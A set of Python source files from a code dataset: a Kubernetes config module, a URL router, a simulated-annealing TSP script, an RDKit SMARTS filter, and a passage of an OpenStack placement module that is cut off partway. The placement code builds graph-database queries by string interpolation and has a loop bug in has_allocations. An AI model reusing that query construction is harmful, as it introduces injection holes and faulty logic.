\"\"\"\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})-[:CONTAINS]->(child)\n RETURN count(child) AS num\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n return bool(result[0][\"num\"])\n\n\n@db_api.placement_context_manager.writer\ndef _set_root_provider_id(ctx, rp_id, root_id):\n \"\"\"Simply sets the root_provider_id value for a provider identified by\n rp_id. Used in implicit online data migration via REST API getting\n resource providers.\n\n :param rp_id: Internal ID of the provider to update\n :param root_id: Value to set root provider to\n\n NOTE (edleafe): This is not needed with a graph DB, and should be removed.\n \"\"\"\n return\n\n\n@db_api.placement_context_manager.writer\ndef set_root_provider_ids(context, batch_size):\n \"\"\"Simply sets the root_provider_id value for a provider identified by\n rp_id. Used in explicit online data migration via CLI.\n\n :param rp_id: Internal ID of the provider to update\n :param root_id: Value to set root provider to\n\n NOTE (edleafe): This is not needed with a graph DB, and should be removed.\n \"\"\"\n return\n\n\nclass ResourceProvider(object):\n SETTABLE_FIELDS = ('name', 'parent_provider_uuid')\n\n def __init__(self, ctx, uuid=None, name=None, generation=None,\n parent_provider_uuid=None, updated_at=None, created_at=None,\n provider_type=None, **kwargs):\n self._context = ctx\n self.uuid = uuid\n self.name = name\n self.generation = generation\n self.updated_at = updated_at\n self.created_at = created_at\n self.provider_type = provider_type\n # Hold this for setting relationships at create() time.\n self._parent_provider_uuid = parent_provider_uuid\n\n @property\n def root_provider_uuid(self):\n return _root_provider_for_rp(self._context, self)\n\n @property\n def parent_provider_uuid(self):\n return _parent_provider_for_rp(self._context, self)\n\n @parent_provider_uuid.setter\n def parent_provider_uuid(self, pp_uuid):\n self._parent_provider_uuid = pp_uuid\n\n def create(self):\n if self.uuid is None:\n raise exception.ObjectActionError(action='create',\n reason='uuid is required')\n if not self.name:\n raise exception.ObjectActionError(action='create',\n reason='name is required')\n\n # These are the only fields we are willing to create with.\n # If there are others, ignore them.\n updates = {\n 'name': self.name,\n 'uuid': self.uuid,\n 'parent_provider_uuid': self._parent_provider_uuid,\n }\n self._create_in_db(self._context, updates)\n\n def destroy(self):\n self._delete(self._context, self.uuid)\n\n def save(self):\n # These are the only fields we are willing to save with.\n # If there are others, ignore them.\n updates = {\n 'name': self.name,\n 'parent_provider_uuid': self._parent_provider_uuid,\n }\n self._update_in_db(self._context, updates)\n\n @classmethod\n def get_by_uuid(cls, ctx, uuid):\n \"\"\"Returns a new ResourceProvider object with the supplied UUID.\n\n :raises NotFound if no such provider could be found\n :param uuid: UUID of the provider to search for\n \"\"\"\n rp_rec = _get_provider_by_uuid(ctx, uuid)\n return cls._from_db_object(ctx, cls(ctx), rp_rec)\n\n def add_inventory(self, inventory):\n \"\"\"Add one new Inventory to the resource provider.\n\n Fails if Inventory of the provided resource class is\n already present.\n \"\"\"\n _add_inventory(self._context, self, inventory)\n\n def delete_inventory(self, resource_class):\n \"\"\"Delete Inventory of provided resource_class.\"\"\"\n _delete_inventory(self._context, self, resource_class)\n\n def set_inventory(self, inv_list):\n \"\"\"Set 
all resource provider Inventory to be the provided list.\"\"\"\n exceeded = _set_inventory(self._context, self, inv_list)\n for uuid, rclass in exceeded:\n LOG.warning('Resource provider %(uuid)s is now over-'\n 'capacity for %(resource)s',\n {'uuid': uuid, 'resource': rclass})\n\n def update_inventory(self, inventory):\n \"\"\"Update one existing Inventory of the same resource class.\n\n Fails if no Inventory of the same class is present.\n \"\"\"\n exceeded = _update_inventory(self._context, self, inventory)\n for uuid, rclass in exceeded:\n LOG.warning('Resource provider %(uuid)s is now over-'\n 'capacity for %(resource)s',\n {'uuid': uuid, 'resource': rclass})\n\n def get_aggregates(self):\n \"\"\"Get the aggregate uuids associated with this resource provider.\"\"\"\n return _get_aggregates_by_provider(self._context, self)\n\n def set_aggregates(self, aggregate_uuids, increment_generation=False):\n \"\"\"Set the aggregate uuids associated with this resource provider.\n\n If an aggregate does not exist, one will be created using the\n provided uuid.\n\n The resource provider generation is incremented if and only if the\n increment_generation parameter is True.\n \"\"\"\n _set_aggregates(self._context, self, aggregate_uuids,\n increment_generation=increment_generation)\n\n def set_traits(self, traits):\n \"\"\"Replaces the set of traits associated with the resource provider\n with the given list of Trait objects.\n\n :param traits: A list of Trait objects representing the traits to\n associate with the provider.\n \"\"\"\n _set_traits(self._context, self, traits)\n\n def increment_generation(self):\n \"\"\"Increments this provider's generation value, supplying the\n currently-known generation.\n\n :raises placement.exception.ConcurrentUpdateDetected: if another thread\n updated the resource provider's view of its inventory or\n allocations in between the time when this object was originally\n read and the call to set the inventory.\n \"\"\"\n rp_gen = self.generation\n new_generation = rp_gen + 1\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WHERE rp.generation = %s\n WITH rp\n SET rp.generation = %s\n RETURN rp\n \"\"\" % (self.uuid, rp_gen, new_generation)\n result = self._context.tx.run(query).data()\n if not result:\n raise exception.ResourceProviderConcurrentUpdateDetected()\n self.generation = new_generation\n\n @db_api.placement_context_manager.writer\n def _create_in_db(self, ctx, updates):\n # User supplied a parent, let's make sure it exists\n parent_uuid = updates.pop('parent_provider_uuid')\n parent_create_clause = \"\"\n atts = [\"uuid: '%s'\" % self.uuid, \"name: '%s'\" % self.name,\n \"generation: 0\", \"created_at: timestamp()\",\n \"updated_at: timestamp()\"]\n if parent_uuid is not None:\n # Setting parent to ourselves doesn't make any sense\n if parent_uuid == self.uuid:\n raise exception.ObjectActionError(\n action=\"create\",\n reason=\"parent provider UUID cannot be same as UUID. 
\"\n \"Please set parent provider UUID to None if \"\n \"there is no parent.\")\n\n # Verify that the parent exists\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent\n \"\"\" % parent_uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.ObjectActionError(\n action='create',\n reason='parent provider UUID does not exist.')\n parent_create_clause = \"\"\"\n WITH rp\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp, parent\n MERGE (parent)-[:CONTAINS]->(rp)\n \"\"\" % parent_uuid\n # Create the RP, and if there is a parent, create the relationship\n att_clause = \", \".join(atts)\n query = \"\"\"\n CREATE (rp:RESOURCE_PROVIDER {%s})\n %s\n RETURN rp\n \"\"\" % (att_clause, parent_create_clause)\n result = ctx.tx.run(query).data()\n rp_db = db.pythonize(result[0][\"rp\"])\n self.generation = rp_db.generation\n self.created_at = rp_db.created_at\n self.updated_at = rp_db.updated_at\n\n @staticmethod\n @db_api.placement_context_manager.writer\n def _delete(ctx, uuid):\n # First, we want to make sure that the RP exists\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN rp\n \"\"\" % uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.NotFound(\n \"No resource provider with uuid %s found\" % uuid)\n # Do a quick check to see if the provider is a parent. If it is, don't\n # allow deleting the provider. Note that the foreign key constraint on\n # resource_providers.parent_provider_id will prevent deletion of the\n # parent within the transaction below. This is just a quick\n # short-circuit outside of the transaction boundary.\n if _has_child_providers(ctx, uuid):\n raise exception.CannotDeleteParentResourceProvider()\n\n # Delete any inventory associated with the resource provider. This will\n # fail if the inventory has any allocations against it.\n try:\n _delete_inventory_from_provider(ctx, uuid)\n except exception.InventoryInUse:\n raise exception.ResourceProviderInUse()\n query = \"\"\"\n MATCH p=(me:RESOURCE_PROVIDER {uuid: '%s'})-[:PROVIDES]->(inv)\n WITH me, inv, last(relationships(p)) AS provisions\n DELETE provisions\n \"\"\" % uuid\n try:\n result = ctx.tx.run(query).data()\n except db.ClientError:\n raise exception.ResourceProviderInUse()\n query = \"\"\"\n MATCH (me:RESOURCE_PROVIDER {uuid: '%s'})-[:PROVIDES]->(inv)\n WITH inv\n DELETE inv\n \"\"\" % uuid\n try:\n result = ctx.tx.run(query).data()\n except db.ClientError:\n raise exception.ResourceProviderInUse()\n\n # Now delete the RP record\n query = \"\"\"\n MATCH (rp:RESOURCE_PROVIDER {uuid: '%s'})\n DETACH DELETE rp\n RETURN rp\n \"\"\" % uuid\n result = ctx.tx.run(query).data()\n\n @db_api.placement_context_manager.writer\n def _update_in_db(self, ctx, updates):\n # A list of resource providers in the same tree with the\n # resource provider to update\n same_tree = []\n if 'parent_provider_uuid' in updates:\n # TODO(jaypipes): For now, \"re-parenting\" and \"un-parenting\" are\n # not possible. 
If the provider already had a parent, we don't\n # allow changing that parent due to various issues, including:\n #\n # * if the new parent is a descendant of this resource provider, we\n # introduce the possibility of a loop in the graph, which would\n # be very bad\n # * potentially orphaning heretofore-descendants\n #\n # So, for now, let's just prevent re-parenting...\n parent_uuid = updates.get(\"parent_provider_uuid\")\n curr_parent_uuid = self.parent_provider_uuid\n if parent_uuid is not None:\n if (curr_parent_uuid is not None and\n (curr_parent_uuid != parent_uuid)):\n raise exception.ObjectActionError(\n action=\"update\",\n reason=\"re-parenting a provider is not currently \"\n \"allowed.\")\n # Make sure that the parent node exists\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent.uuid AS parent_uuid\n \"\"\" % parent_uuid\n result = ctx.tx.run(query).data()\n if not result:\n raise exception.ObjectActionError(\n action=\"create\",\n reason=\"parent provider UUID does not exist.\")\n if curr_parent_uuid is None:\n # We can set the parent relationship, but first we need to\n # check that this parent isn't already related to this\n # node, or else we can get a circular relationship instead\n # of a tree.\n query = \"\"\"\n // Get all the inbound relations\n MATCH (rp:RESOURCE_PROVIDER)-[*]->\n (:RESOURCE_PROVIDER {uuid:'%s'})\n RETURN rp\n UNION\n // Get all the outbound relations\n MATCH (:RESOURCE_PROVIDER {uuid:'%s'})-[*]->\n (rp:RESOURCE_PROVIDER)\n RETURN rp\n UNION\n // Get this node\n MATCH (rp:RESOURCE_PROVIDER {uuid:'%s'})\n RETURN rp\n \"\"\" % (self.uuid, self.uuid, self.uuid)\n result = ctx.tx.run(query).data()\n tree_uuids = [rec[\"rp\"][\"uuid\"] for rec in result]\n if parent_uuid in tree_uuids:\n raise exception.ObjectActionError(\n action=\"update\",\n reason=\"creating loop in the provider tree is \"\n \"not allowed.\")\n # Everything checks out; set the parent relationship\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER {uuid: '%s'})\n MATCH (me:RESOURCE_PROVIDER {uuid: '%s'})\n WITH parent, me\n CREATE (parent)-[:CONTAINS]->(me)\n RETURN parent\n \"\"\" % (parent_uuid, self.uuid)\n result = ctx.tx.run(query).data()\n else:\n # Ensure that a null parent uuid is not being passed when there\n # already is a parent to this node.\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER)-[:CONTAINS]->\n (:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent\n \"\"\" % self.uuid\n result = ctx.tx.run(query).data()\n if result:\n raise exception.ObjectActionError(\n action='update',\n reason='un-parenting a provider is not currently '\n 'allowed.')\n\n update_lines = []\n for key, val in updates.items():\n if isinstance(val, six.string_types):\n txt = \"rp.%s = '%s'\" % (key, val)\n else:\n if val is None:\n val = \"null\"\n txt = \"rp.%s = %s\" % (key, val)\n update_lines.append(txt)\n if not \"generation\" in updates and not hasattr(self, \"generation\"):\n update_lines.append(\"rp.generation = 0\")\n if not \"created_at\" in updates and not hasattr(self, \"created_at\"):\n update_lines.append(\"rp.created_at = timestamp()\")\n if not \"updated_at\" in updates:\n update_lines.append(\"rp.updated_at = timestamp()\")\n update_clause = \", \".join(update_lines)\n query = \"\"\"\n MERGE (rp:RESOURCE_PROVIDER {uuid: '%s'})\n WITH rp\n SET %s\n RETURN rp\n \"\"\" % (self.uuid, update_clause)\n result = ctx.tx.run(query).data()\n self._from_db_object(ctx, self, db.pythonize(result[0][\"rp\"]))\n\n @staticmethod\n 
@db_api.placement_context_manager.writer # For online data migration\n def _from_db_object(ctx, resource_provider, db_resource_provider):\n for field in [\"uuid\", \"name\", \"generation\", \"updated_at\",\n \"created_at\"]:\n setattr(resource_provider, field, db_resource_provider.get(field))\n return resource_provider\n\n @classmethod\n def create_tree(cls, ctx, tree):\n \"\"\"This method accepts a nested dict that describes a tree-like\n relationship among resource providers. Each node on the tree should\n contain the following keys:\n name: the name given to the resource. If not supplied, no name is\n set.\n uuid: the resource's UUID. If not supplied, one will be generated.\n resources: a dict of resources that this node provides directly.\n Each member should be of the form `resource_class: amount`\n traits: a list of traits to apply to this node.\n children: a list of nodes representing the children of this node.\n Each child node should be the same format dict as described\n here.\n\n The root provider of the newly-created tree is returned.\n\n Note: There is no limit to the level of nesting for child resource\n providers.\n \"\"\"\n rp_rec = _create_tree(ctx, tree)\n return cls._from_db_object(ctx, cls(ctx), rp_rec)\n\n\n@db_api.placement_context_manager.reader\ndef get_providers_with_shared_capacity(ctx, rc_name, amount, member_of=None):\n \"\"\"Returns a list of resource provider UUIDs that have capacity for a\n requested amount of a resource and indicate that they share resource via an\n aggregate association.\n\n For example, assume we have two compute nodes, CN_1 and CN_2, each with\n inventory of VCPU and MEMORY_MB but not DISK_GB (in other words, these are\n compute nodes with no local disk). There is a resource provider called\n \"NFS_SHARE\" that has an inventory of DISK_GB. 
Both the \"CN_1\" and \"CN_2\"\n compute node resource providers are related to the \"NFS_SHARE\" resource\n provider with an [:ASSOCIATED] relationship.\n\n The scheduler needs to determine the resource providers that can fulfill a\n request for 2 VCPU, 1024 MEMORY_MB and 100 DISK_GB.\n\n Clearly, no single provider can satisfy the request for all three\n resources, since neither compute node has DISK_GB inventory and the\n NFS_SHARE provider has no VCPU or MEMORY_MB inventories.\n\n However, if we consider the NFS_SHARE resource provider as providing\n inventory of DISK_GB for both CN_1 and CN_2, we can include CN_1 and CN_2\n as potential fits for the requested set of resources.\n\n To facilitate that matching query, this function returns all providers that\n indicate they share their inventory with providers in some aggregate and\n have enough capacity for the requested amount of a resource.\n\n To follow the example above, if we were to call\n get_providers_with_shared_capacity(ctx, \"DISK_GB\", 100), we would want to\n get back the ID for the NFS_SHARE resource provider.\n\n :param rc_name: Name of the requested resource class.\n :param amount: Amount of the requested resource.\n :param member_of: When present, contains a list of lists of aggregate\n uuids that are used to filter the returned list of\n resource providers that *directly* belong to the\n aggregates referenced.\n \"\"\"\n query = \"\"\"\n MATCH ()-[:ASSOCIATED]->(rp:RESOURCE_PROVIDER)\n WITH rp\n MATCH (rp)-[:PROVIDES]->(rc:%s)\n WITH rp, rc\n OPTIONAL MATCH p=(cs:CONSUMER)-[:USES]->(rc)\n WITH rp, rc, relationships(p)[0] AS usages\n WITH rp, rc, sum(usages.amount) AS total_used,\n ((rc.total - rc.reserved) * rc.allocation_ratio) AS capacity\n MATCH (rc)\n WHERE capacity - total_used >= %s\n RETURN rp.uuid AS rp_uuid\n \"\"\" % (rc_name, amount)\n result = ctx.tx.run(query).data()\n return [rec[\"rp_uuid\"] for rec in result]\n\n\n@db_api.placement_context_manager.reader\ndef _get_all_by_filters_from_db(ctx, filters):\n # Eg. 
filters can be:\n # filters = {\n # 'name': ,\n # 'uuid': ,\n # 'member_of': [[, ],\n # []]\n # 'forbidden_aggs': [, ]\n # 'resources': {\n # 'VCPU': 1,\n # 'MEMORY_MB': 1024\n # },\n # 'in_tree': ,\n # 'required': [, ...]\n # }\n if not filters:\n filters = {}\n else:\n # Since we modify the filters, copy them so that we don't modify\n # them in the calling program.\n filters = copy.deepcopy(filters)\n name = filters.pop('name', None)\n uuid = filters.pop('uuid', None)\n member_of = filters.pop('member_of', [])\n forbidden_aggs = filters.pop('forbidden_aggs', [])\n required = set(filters.pop('required', []))\n forbidden = set([trait for trait in required\n if trait.startswith('!')])\n required = required - forbidden\n forbidden = set([trait.lstrip('!') for trait in forbidden])\n resources = filters.pop('resources', {})\n in_tree = filters.pop('in_tree', None)\n\n rp_props = []\n if name:\n rp_props.append(\"name: '%s'\" % name)\n if uuid:\n rp_props.append(\"uuid: '%s'\" % uuid)\n if rp_props:\n rp_prop_str = \" {%s}\" % \", \".join(rp_props)\n else:\n rp_prop_str = \"\"\n rp_str =\"rp:RESOURCE_PROVIDER%s\" % rp_prop_str\n\n # Build the query line-by-line, incorporating all the filters\n query_lines = []\n if in_tree:\n tree_query = \"\"\"\n MATCH (root:RESOURCE_PROVIDER)-[:CONTAINS*0..99]->\n (tree:RESOURCE_PROVIDER {uuid: '%s'})\n OPTIONAL MATCH r=()-->(root)\n WITH root, relationships(r) AS rootrel\n WHERE rootrel IS null\n MATCH (root)-[:CONTAINS*0..99]->(%s)\n WITH rp\n \"\"\" % (in_tree, rp_str)\n query_lines.append(tree_query)\n else:\n query_lines.append(\"MATCH (%s)\" % rp_str)\n query_lines.append(\"WITH rp\")\n\n if resources:\n # This will raise a 'ResourceClassNotFound' exception if any resource\n # classes are not valid names. \n res_ctx.validate_resources(ctx, list(resources.keys()))\n rps_with_rsrcs = []\n for rc_name, amount in resources.items():\n rps = res_ctx.get_providers_with_resource(ctx, rc_name, amount)\n rps_with_rsrcs.append(set([rp[0] for rp in rps]))\n good_rps = rps_with_rsrcs[0]\n for rsrc_set in rps_with_rsrcs[1:]:\n good_rps.intersection_update(rsrc_set)\n # Now create the query lines to limit RPs to just those with sufficient\n # resources.\n query_lines.append(\"WHERE rp.uuid IN %s\" % list(good_rps))\n query_lines.append(\"WITH rp\")\n\n if member_of:\n for num, agg in enumerate(member_of):\n query_lines.append(\"MATCH (rp)-[:ASSOCIATED]->(agg{num})\".format(\n num=num))\n query_lines.append(\"WHERE agg{num}.uuid IN {agglist}\".format(\n num=num, agglist=util.makelist(agg)))\n query_lines.append(\"WITH rp\")\n if forbidden_aggs:\n for agg in forbidden_aggs:\n query_lines.append(\"MATCH (badagg:AGGREGATE)\")\n query_lines.append(\"WHERE badagg.uuid in {agg}\".format(agg=util.makelist(agg)))\n query_lines.append(\"WITH rp, badagg\")\n query_lines.append(\"WHERE NOT EXISTS( (rp)-[:ASSOCIATED]->(badagg) )\")\n query_lines.append(\"WITH rp\")\n trait_filters = []\n # This will raise a 'TraitNotFound' exception if any required or forbidden\n # traits are specified. 
These values are passed in as sets.\n all_traits = required | forbidden\n res_ctx.validate_traits(ctx, all_traits)\n for trait in required:\n trait_filters.append(\"EXISTS(rp.%s)\" % trait)\n for trait in forbidden:\n trait_filters.append(\"NOT EXISTS(rp.%s)\" % trait)\n trait_str = \" AND \".join(trait_filters)\n if trait_str:\n query_lines.append(\"WHERE %s\" % trait_str)\n query_lines.append(\"WITH rp\")\n query_lines.append(\"RETURN rp\")\n query = \"\\n\".join(query_lines)\n result = ctx.tx.run(query).data()\n return [db.pythonize(rec[\"rp\"]) for rec in result]\n\n\ndef get_all_by_filters(ctx, filters=None):\n \"\"\"Returns a list of `ResourceProvider` objects that have sufficient\n resources in their inventories to satisfy the amounts specified in the\n `filters` parameter.\n\n If no resource providers can be found, the function will return an\n empty list.\n\n :param ctx: `placement.context.RequestContext` that may be used to\n grab a DB connection.\n :param filters: Can be `name`, `uuid`, `member_of`, `in_tree` or\n `resources` where `member_of` is a list of list of\n aggregate UUIDs, `in_tree` is a UUID of a resource\n provider that we can use to find the root provider ID\n of the tree of providers to filter results by and\n `resources` is a dict of amounts keyed by resource\n classes.\n :type filters: dict\n \"\"\"\n resource_providers = _get_all_by_filters_from_db(ctx, filters)\n return [ResourceProvider(ctx, **rp) for rp in resource_providers]\n\n\n@db_api.placement_context_manager.reader\ndef _parent_provider_for_rp(ctx, rp):\n \"\"\"Given a resource provider, returns the UUID of its parent. If there is\n no parent for this node, returns None.\n \"\"\"\n rp_uuid = rp.uuid if isinstance(rp, ResourceProvider) else rp\n query = \"\"\"\n MATCH (parent:RESOURCE_PROVIDER)-[:CONTAINS*1]->\n (rp:RESOURCE_PROVIDER {uuid: '%s'})\n RETURN parent.uuid AS parent_uuid\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if result:\n return result[0][\"parent_uuid\"]\n else:\n return None\n\n\n@db_api.placement_context_manager.reader\ndef _root_provider_for_rp(ctx, rp):\n \"\"\"Given a resource provider, returns the UUID of its root. If there is no\n parent for this node, returns its own UUID.\n \"\"\"\n rp_uuid = rp.uuid if isinstance(rp, ResourceProvider) else rp\n query = \"\"\"\n MATCH p=(root:RESOURCE_PROVIDER)-[:CONTAINS*0..99]->\n (nd:RESOURCE_PROVIDER {uuid: '%s'})\n WITH root, p, size(relationships(p)) AS relsize\n ORDER BY relsize DESC\n RETURN root.uuid AS root_uuid\n \"\"\" % rp_uuid\n result = ctx.tx.run(query).data()\n if result:\n return result[0][\"root_uuid\"]\n else:\n return rp_uuid\n\n\n@db_api.placement_context_manager.reader\ndef is_nested(ctx, rp1_uuid, rp2_uuid):\n \"\"\"Returns True if the two resource providers are related with a :CONTAINS\n relationship. 
The direction of the relationship doesn't matter.\n \"\"\"\n query = \"\"\"\n MATCH p=(rp1 {uuid: '%s'})-[:CONTAINS*]-(rp2 {uuid: '%s'})\n RETURN p\n \"\"\" % (rp1_uuid, rp2_uuid)\n result = ctx.tx.run(query).data()\n return bool(result)\n\n\n@db_api.placement_context_manager.writer\ndef _create_tree(ctx, tree, parent_uuid=None):\n atts = []\n if \"name\" in tree:\n nm = tree[\"name\"]\n atts.append(\"name: '{name}'\".format(name=nm))\n if \"type\" in tree:\n tp = tree[\"type\"]\n atts.append(\"provider_type: '{tp}'\".format(tp=tp))\n uuid = tree[\"uuid\"] if \"uuid\" in tree else db.gen_uuid()\n atts.append(\"uuid: '{uuid}'\".format(uuid=uuid))\n for trait in tree[\"traits\"]:\n atts.append(\"{trait}: True\".format(trait=trait))\n atts.append(\"generation: 0\")\n atts.append(\"created_at: timestamp()\")\n atts.append(\"updated_at: timestamp()\")\n atts_clause = \", \".join(atts)\n \n provides = []\n for rsrc in tree[\"resources\"]:\n rc_name = rsrc.get(\"name\")\n total = rsrc.get(\"total\")\n reserved = rsrc.get(\"reserved\", 0)\n min_unit= rsrc.get(\"min_unit\", 1)\n max_unit = rsrc.get(\"max_unit\", total)\n step_size = rsrc.get(\"step_size\", 1)\n allocation_ratio = rsrc.get(\"allocation_ratio\", 1)\n prov_stmnt = \"\"\"\nWITH nd\nCREATE (nd)-[:PROVIDES]->(:{rc_name}\n{{total: {total}, reserved: {reserved}, min_unit: {min_unit},\nmax_unit: {max_unit}, allocation_ratio: {allocation_ratio},\nstep_size: {step_size} }})\"\"\".format(rc_name=rc_name, total=total,\n reserved=reserved, min_unit=min_unit, max_unit=max_unit,\n allocation_ratio=allocation_ratio, step_size=step_size)\n provides.append(prov_stmnt)\n\n prov_clause = \"\\n\".join(provides)\n if parent_uuid:\n query = \"\"\"\nMATCH (parent:RESOURCE_PROVIDER {{ uuid: '{parent_uuid}' }})\nWITH parent\nCREATE (parent)-[:CONTAINS]->(nd:RESOURCE_PROVIDER {{ {atts_clause} }})\n{prov_clause}\nRETURN nd AS rp\"\"\".format(parent_uuid=parent_uuid,\n atts_clause=atts_clause, prov_clause=prov_clause)\n else:\n # Primary node\n query = \"\"\"\nCREATE (nd:RESOURCE_PROVIDER {{ {atts_clause} }})\n{prov_clause}\nRETURN nd AS rp\"\"\".format(atts_clause=atts_clause,\n prov_clause=prov_clause)\n\n result = ctx.tx.run(query).data()\n rp_rec = result[0][\"rp\"]\n # Call recursively to add child nodes, if any\n child_nodes = tree.get(\"children\", [])\n for child in child_nodes:\n _create_tree(ctx, child, rp_rec[\"uuid\"])\n return rp_rec\n","sub_path":"placement/objects/resource_provider.py","file_name":"resource_provider.py","file_ext":"py","file_size_in_byte":51025,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
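In the `resource_provider.py` record above, required traits prefixed with `!` are peeled off into a forbidden set before the Cypher query is built. A minimal standalone sketch of that split (the trait names are only examples):

```python
# Mirrors the required/forbidden trait split in _get_all_by_filters_from_db.
required = {"HW_CPU_X86_AVX2", "STORAGE_DISK_SSD", "!CUSTOM_SLOW_DISK"}

forbidden = {trait for trait in required if trait.startswith("!")}
required = required - forbidden
forbidden = {trait.lstrip("!") for trait in forbidden}

print(sorted(required))   # ['HW_CPU_X86_AVX2', 'STORAGE_DISK_SSD']
print(sorted(forbidden))  # ['CUSTOM_SLOW_DISK']
```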
+{"seq_id":"584684439","text":"from __future__ import (\n absolute_import,\n unicode_literals,\n)\n\nimport uuid\n\nfrom conformity import fields\n\nfrom pysoa.common.metrics import TimerResolution\nfrom pysoa.common.transport.base import (\n ClientTransport,\n get_hex_thread_id,\n)\nfrom pysoa.common.transport.exceptions import MessageReceiveTimeout\nfrom pysoa.common.transport.redis_gateway.backend.base import BaseRedisClient\nfrom pysoa.common.transport.redis_gateway.constants import DEFAULT_MAXIMUM_MESSAGE_BYTES_CLIENT\nfrom pysoa.common.transport.redis_gateway.core import RedisTransportCore\nfrom pysoa.common.transport.redis_gateway.settings import RedisTransportSchema\nfrom pysoa.common.transport.redis_gateway.utils import make_redis_queue_name\n\n\n@fields.ClassConfigurationSchema.provider(RedisTransportSchema())\nclass RedisClientTransport(ClientTransport):\n\n def __init__(self, service_name, metrics, **kwargs):\n \"\"\"\n In addition to the two named positional arguments, this constructor expects keyword arguments abiding by the\n Redis transport settings schema.\n\n :param service_name: The name of the service to which this transport will send requests (and from which it will\n receive responses)\n :type service_name: union[str, unicode]\n :param metrics: The optional metrics recorder\n :type metrics: MetricsRecorder\n \"\"\"\n super(RedisClientTransport, self).__init__(service_name, metrics)\n\n if 'maximum_message_size_in_bytes' not in kwargs:\n kwargs['maximum_message_size_in_bytes'] = DEFAULT_MAXIMUM_MESSAGE_BYTES_CLIENT\n\n self.client_id = uuid.uuid4().hex\n self._send_queue_name = make_redis_queue_name(service_name)\n self._receive_queue_name = '{send_queue_name}.{client_id}{response_queue_specifier}'.format(\n send_queue_name=self._send_queue_name,\n client_id=self.client_id,\n response_queue_specifier=BaseRedisClient.RESPONSE_QUEUE_SPECIFIER,\n )\n self._requests_outstanding = 0\n self.core = RedisTransportCore(service_name=service_name, metrics=metrics, metrics_prefix='client', **kwargs)\n\n @property\n def requests_outstanding(self):\n \"\"\"\n Indicates the number of requests currently outstanding, which still need to be received. 
If this value is less\n than 1, calling `receive_response_message` will result in a return value of `(None, None, None)` instead of\n raising a `MessageReceiveTimeout`.\n \"\"\"\n return self._requests_outstanding\n\n def send_request_message(self, request_id, meta, body, message_expiry_in_seconds=None):\n self._requests_outstanding += 1\n meta['reply_to'] = '{receive_queue_name}{thread_id}'.format(\n receive_queue_name=self._receive_queue_name,\n thread_id=get_hex_thread_id(),\n )\n\n with self.metrics.timer('client.transport.redis_gateway.send', resolution=TimerResolution.MICROSECONDS):\n self.core.send_message(self._send_queue_name, request_id, meta, body, message_expiry_in_seconds)\n\n def receive_response_message(self, receive_timeout_in_seconds=None):\n if self._requests_outstanding > 0:\n with self.metrics.timer('client.transport.redis_gateway.receive', resolution=TimerResolution.MICROSECONDS):\n try:\n request_id, meta, response = self.core.receive_message(\n '{receive_queue_name}{thread_id}'.format(\n receive_queue_name=self._receive_queue_name,\n thread_id=get_hex_thread_id(),\n ),\n receive_timeout_in_seconds,\n )\n except MessageReceiveTimeout:\n self.metrics.counter('client.transport.redis_gateway.receive.error.timeout').increment()\n raise\n self._requests_outstanding -= 1\n return request_id, meta, response\n else:\n # This tells Client.get_all_responses to stop waiting for more.\n return None, None, None\n","sub_path":"pysoa/common/transport/redis_gateway/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":4117,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
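The `RedisClientTransport` above derives its receive queue name from the send queue plus a per-client UUID and a response-queue specifier. A rough standalone illustration; the specifier value here is an assumption, the real one comes from `BaseRedisClient.RESPONSE_QUEUE_SPECIFIER`:

```python
import uuid

RESPONSE_QUEUE_SPECIFIER = "!"  # assumed value, for illustration only

send_queue_name = "service.example_service"  # hypothetical service queue
client_id = uuid.uuid4().hex
receive_queue_name = "{send}.{client}{spec}".format(
    send=send_queue_name, client=client_id, spec=RESPONSE_QUEUE_SPECIFIER)
print(receive_queue_name)  # service.example_service.<32 hex chars>!
```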
+{"seq_id":"298354185","text":"## import skeleton process\nimport FWCore.ParameterSet.Config as cms\n\nprocess = cms.Process(\"DAS\")\n\nprocess.load(\"FWCore.MessageService.MessageLogger_cfi\")\n\nprocess.maxEvents = cms.untracked.PSet( input = cms.untracked.int32(1000) )\n\nprocess.source = cms.Source(\"PoolSource\",\n fileNames = cms.untracked.vstring(\n #'root://cmseos.fnal.gov//store/user/cmsdas/2017/pre_exercises/DYJetsToLL.root'\n '/store/mc/RunIISpring15DR74/TTGJets_TuneCUETP8M1_13TeV-amcatnloFXFX-madspin-pythia8/MINIAODSIM/Asympt25ns_MCRUN2_74_V9-v1/30000/101C5701-2141-E511-B832-00259073E532.root'\n )\n )\n\n\nprocess.out = cms.OutputModule(\"PoolOutputModule\",\n fileName = cms.untracked.string('slimMiniAOD_MC_MuEle_topquark.root'),\n #outputCommands = cms.untracked.vstring(['drop *', 'keep *_slimmedMuons__*', 'keep *_slimmedElectrons__*', 'keep *_slimmedJets__*', 'keep *_slimmedMETs__*'])\n outputCommands = cms.untracked.vstring(['drop *', \\\n 'keep *_slimmedMuons__*', \\\n 'keep *_slimmedElectrons__*', \\\n 'keep *_slimmedJets__*', \\\n 'keep *_slimmedJetsPuppi__*', \\\n 'keep *_slimmedMETs__*', \\\n 'keep *_slimmedTaus__*', \\\n #'keep *_slimmedTausBoosted__*', \\\n 'keep *_offlineSlimmedPrimaryVertices__*', \\\n 'keep *_prunedGenParticles__*', \\\n 'keep *_slimmedPhotons__*'])\n )\n\nprocess.end = 